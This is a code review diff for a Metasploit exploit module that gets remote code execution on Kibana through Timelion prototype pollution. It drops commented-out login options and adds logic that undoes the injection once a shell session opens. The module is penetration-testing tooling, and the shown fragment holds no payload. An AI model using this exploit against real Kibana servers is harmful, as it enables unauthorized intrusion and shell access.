review comments

modules/exploits/linux/http/kibana_timelion_prototype_pollution_rce.rb

@@ -62,8 +62,6 @@ def initialize(info = {})
     register_options(
       [
         Opt::RPORT(5601),
-        # OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
-        # OptString.new('PASSWORD', [ false, 'Password to login with', '123456']),
         OptString.new('TARGETURI', [ true, 'The URI of the Kibana Application', '/'])
       ]
     )
@@ -178,8 +176,22 @@ def exploit
     trigger_socket
     print_status('Waiting for shells')
     Rex.sleep(datastore['WFSDELAY'] / 10)
+    unless @reset_done
+      print_status('Unsetting to stop raining shells from a lacerated kibana')
+      send_injection(reset: true)
+      trigger_socket
+    end
+  end
+
+  def on_new_session(_client)
+    return if @reset_done
+
     print_status('Unsetting to stop raining shells from a lacerated kibana')
     send_injection(reset: true)
     trigger_socket
+    @reset_done = true
+  ensure
+    super
   end
+
 end